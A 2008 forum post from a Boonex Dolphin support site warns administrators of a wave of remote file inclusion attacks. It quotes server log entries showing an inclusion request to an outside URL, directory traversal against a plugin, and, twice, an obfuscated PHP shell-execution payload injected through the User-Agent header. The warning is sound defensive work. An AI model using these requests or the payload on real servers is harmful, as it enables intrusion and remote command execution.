New RFI Dolphin Security Alerts

It seems there is a new wave of RFI attacks circulating. Be sure to check your logs and keep an eye out for something similar to the following. This is just a sample and I am doing some research and .htaccess modification testing...but just a little heads up for anyone interested.

The host, domains, and ips will most likely very. Notice the agent: http://cr4nk.ws/ [de] (Windows 3.1; I) [crank] which is not something we see very often.

Host: firestarter.dermichi.com





/errors.php?error=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i???
Http Code: 404     Date: Sep 19 19:19:16     Http Version: HTTP/1.1     Size in Bytes: -
Referer: -
Agent: http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]





//plugins/safehtml/HTMLSax3.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../.
Http Code: 200     Date: Sep 19 19:19:17     Http Version: HTTP/1.1     Size in Bytes: 631
Referer: -
Agent: <? $x0e=\\\145x\\x65\\x63\; $x0f=\\\x66eo\\146\; $x10=\\\x66\\x72ea\\x64\; $x11=\\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\; $x12=\i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\; $x13=\\\152\\157\\x69\\156\; $x14=\o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\; $x15=\ob\\137\\x65\\156d\\137\\x63lea\\156\; $x16=\\\x6fb_st\\x61\\x72\\164\; $x17=\\\x70\\141\\163s\\164\\x68\\162\\165\; $x18=\\\x70\\143\\154ose\; $x19=\p\\157\\160e\\x6e\; $x1a=\\\163h\\145\\154l\\137\\x65\\170e\\143\; $x1b=\\\x73\\x79s\\x74e\\x6d\; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\\\n\,$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\\\x72\))){ $x0c = \\; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\);?>





//plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../..
Http Code: 200     Date: Sep 19 19:19:18     Http Version: HTTP/1.1     Size in Bytes: 631
Referer: -
Agent: <? $x0e=\\\145x\\x65\\x63\; $x0f=\\\x66eo\\146\; $x10=\\\x66\\x72ea\\x64\; $x11=\\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\; $x12=\i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\; $x13=\\\152\\157\\x69\\156\; $x14=\o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\; $x15=\ob\\137\\x65\\156d\\137\\x63lea\\156\; $x16=\\\x6fb_st\\x61\\x72\\164\; $x17=\\\x70\\141\\163s\\164\\x68\\162\\165\; $x18=\\\x70\\143\\154ose\; $x19=\p\\157\\160e\\x6e\; $x1a=\\\163h\\145\\154l\\137\\x65\\170e\\143\; $x1b=\\\x73\\x79s\\x74e\\x6d\; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\\\n\,$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\\\x72\))){ $x0c = \\; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\);?>


gameutopia

http://www.dialme.com

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
Quote · 20 Sep 2008
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.